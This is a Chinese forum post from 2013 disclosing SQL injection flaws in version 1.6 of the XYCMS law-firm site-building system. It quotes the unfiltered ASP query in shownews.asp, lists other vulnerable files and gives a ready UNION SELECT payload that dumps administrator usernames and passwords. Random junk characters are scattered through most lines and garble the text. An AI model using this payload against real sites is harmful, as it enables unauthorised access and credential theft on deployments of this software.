前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似- ?/ X; H! K9 P5 n
0 h; M/ L$ r" D' m
淫荡分割线0 K! U/ Q7 j! T$ a
--------------------------------------------------------
+ } H( h1 F, G; V1 \
! @5 n# R7 `! g$ E; X9 |* T审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
4 {4 t. [5 v2 k/ m B( ]/ \$ e源码地址:http://down.chinaz.com/soft/29233.htm( ~5 L7 O9 Y; q. w) x$ x2 ^
( {3 W; s- w$ c
漏洞文件:shownews.asp
" o1 C1 |4 w+ _7 F6 q: ^5 @漏洞代码:7-13行8 \: f# g: o7 j4 n+ W: @
3 y, h1 |: L% x3 B+ D 3 ^1 B6 U" N' P) P7 o
<%
& t7 D* ^& F& n* S6 uid=request.QueryString("id")
& B7 Q$ ~' t X' M& |& w ; y$ c m% Z& b6 @( }# d9 c
set snews=server.createobject("adodb.recordset")
+ G9 V. ~! o9 {. W2 t3 f3 wexec="select * from [news] where id="&id
3 d1 L' Q/ T( J7 J/ d- Jsnews.open exec,conn,1,1, r( g5 J% J# p) y1 T1 J' q7 V
%>
% j4 S# w+ i$ f # N. T4 F( @8 t u! l( c
0 O# g) t0 Z7 [3 @9 X什么过滤都没有 直造成注入* Z5 J6 P, f) G9 ^0 C: ^8 h
) T8 y6 \* C+ y9 p% Z5 Y6 L注入点:http://127.0.0.1:99/shownews.asp?id=xx! w$ [) f0 f ^5 X- x: a' Q- {
% b) U9 R% v! ]3 T其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找) _4 h5 ~ g3 E: H$ y
$ c9 @' x/ a' z. O$ t/ i
# `5 t( K/ z, S+ I
exp: union select 1,admin,password,4,5,7 from admin_user; K: ]0 h+ X7 ~+ }) E
7 ]. Q+ o. K+ g( I |
发表于 2013-4-4 17:28:12
收藏
支持
反对